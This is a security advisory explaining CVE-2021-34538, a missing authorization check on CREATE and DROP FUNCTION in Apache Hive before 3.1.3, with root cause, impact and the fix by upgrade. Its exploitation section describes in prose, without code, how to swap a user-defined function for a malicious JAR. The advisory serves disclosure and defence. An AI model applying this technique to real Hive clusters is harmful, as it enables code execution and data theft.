Apache Hive Security vulnerability in Hive with UDFs

Root

Cause

CVE-2021-34538 is an authorization bypass vulnerability in Apache Hive, affecting versions prior to 3.1.3. The core issue lies in the CREATE FUNCTION and DROP FUNCTION operations, which fail to verify that the user executing the command has the necessary privileges on the involved entities. This means that the authorization checks are either missing or improperly implemented for these specific operations [1].

Exploitation

An attacker can exploit this flaw by simply having access to a Hive query interface, even without elevated privileges. By issuing DROP and CREATE commands against an existing user-defined function (UDF), the attacker can replace that UDF with a reference to a new, potentially malicious Java archive (JAR). No authentication bypass or additional privileges are required beyond the ability to submit Hive queries [1].

Impact

Successful exploitation allows an unauthorized or underprivileged user to alter the behavior of a UDF. When the UDF is subsequently called by other users (including privileged ones), the malicious code within the attacker-supplied JAR is executed within the Hive runtime context. This could lead to arbitrary code execution, data exfiltration, or further compromise of the Hive metastore and underlying Hadoop cluster [1].

Mitigation

The vulnerability is fixed in Apache Hive version 3.1.3. Users running earlier versions should upgrade to this release or later. As of the CVE publication date, no workarounds have been documented, and the vulnerability has not been listed in CISA’s Known Exploited Vulnerabilities (KEV) catalog. The official Hive repository and release notes [2] provide details on obtaining the patched version.